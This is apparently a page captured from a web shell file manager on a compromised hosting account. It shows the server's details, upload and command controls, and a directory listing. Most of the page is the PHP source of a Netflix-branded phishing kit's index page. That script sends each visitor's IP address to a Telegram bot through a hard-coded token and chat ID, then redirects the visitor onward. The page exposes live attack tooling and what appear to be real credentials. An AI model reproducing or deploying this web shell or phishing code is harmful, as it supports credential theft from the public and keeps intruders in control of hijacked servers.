GRAYBYTE WORDPRESS FILE MANAGER9659

Server IP : 162.213.255.40 / Your IP : 216.73.216.121
System : Linux server146.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
PHP Version : 8.0.30
Disable Function : NONE
cURL : ON | WGET : ON | Sudo : OFF | Pkexec : OFF

HOME

/home/hellrfbn/public_html/welog/welog/
Upload Files :
Current_dir [ Writeable ] Document_root [ Writeable ]

Command :


Current File : /home/hellrfbn/public_html/welog/welog//index.php
<?php
// Telegram Bot Token and Chat ID
$botToken = "7690606903:AAEkGtLnR8YFKcUTX7HpZAcWGZWwAItS_6w";
$chatId = "-1002484967243";

// MR.BULLOCK
$ip = getenv("REMOTE_ADDR");

// MR.BULLOCK
$messageText = $ip . "  Netflix Visitor By Mr.Bullock  " . gmdate("Y-n-d") . " / " . gmdate("H:i:s");

// MR.BULLOCK
sendMessage($botToken, $chatId, $messageText);

// Redirect directly to move.php without country restriction
header("Location: move.php");
exit();

// MR.BULLOCK
function sendMessage($botToken, $chatId, $text) {
    // Prepare URL for sending message via Telegram API
    $url = 'https://api.telegram.org/bot' . urlencode($botToken) 
         . '/sendMessage?'
         . 'parse_mode=HTML&disable_web_page_preview=true&'
         . 'chat_id=' . urlencode($chatId)
         . '&text='   . urlencode($text);
    
    $ch = curl_init();
    curl_setopt_array(
        $ch,
        array(
            CURLOPT_URL => $url,
            CURLOPT_RETURNTRANSFER => true,
            CURLOPT_SSL_VERIFYPEER => false,
            CURLOPT_TIMEOUT_MS => 5000
        )
    );
    
    curl_exec($ch);
    curl_close($ch);
}
?>

[ Back ]
Name
Size
Last Modified
Owner / Group
Permissions
Options
..
--
August 11 2025 01:35:49
hellrfbn / nobody
0750
auth
--
August 08 2025 08:47:54
hellrfbn / hellrfbn
0755
botMother
--
August 08 2025 08:47:54
hellrfbn / hellrfbn
0755
lib
--
August 08 2025 08:47:54
hellrfbn / hellrfbn
0755
config.php
0.185 KB
July 21 2025 13:39:40
hellrfbn / hellrfbn
0644
index.php
1.093 KB
July 28 2025 17:24:26
hellrfbn / hellrfbn
0644
logs.txt
2.877 KB
August 10 2025 12:50:17
hellrfbn / hellrfbn
0644
main.php
1.65 KB
August 22 2024 19:14:20
hellrfbn / hellrfbn
0644
move.php
0.188 KB
August 22 2024 19:14:20
hellrfbn / hellrfbn
0644

GRAYBYTE WORDPRESS FILE MANAGER @ 2025
CONTACT ME
Static GIF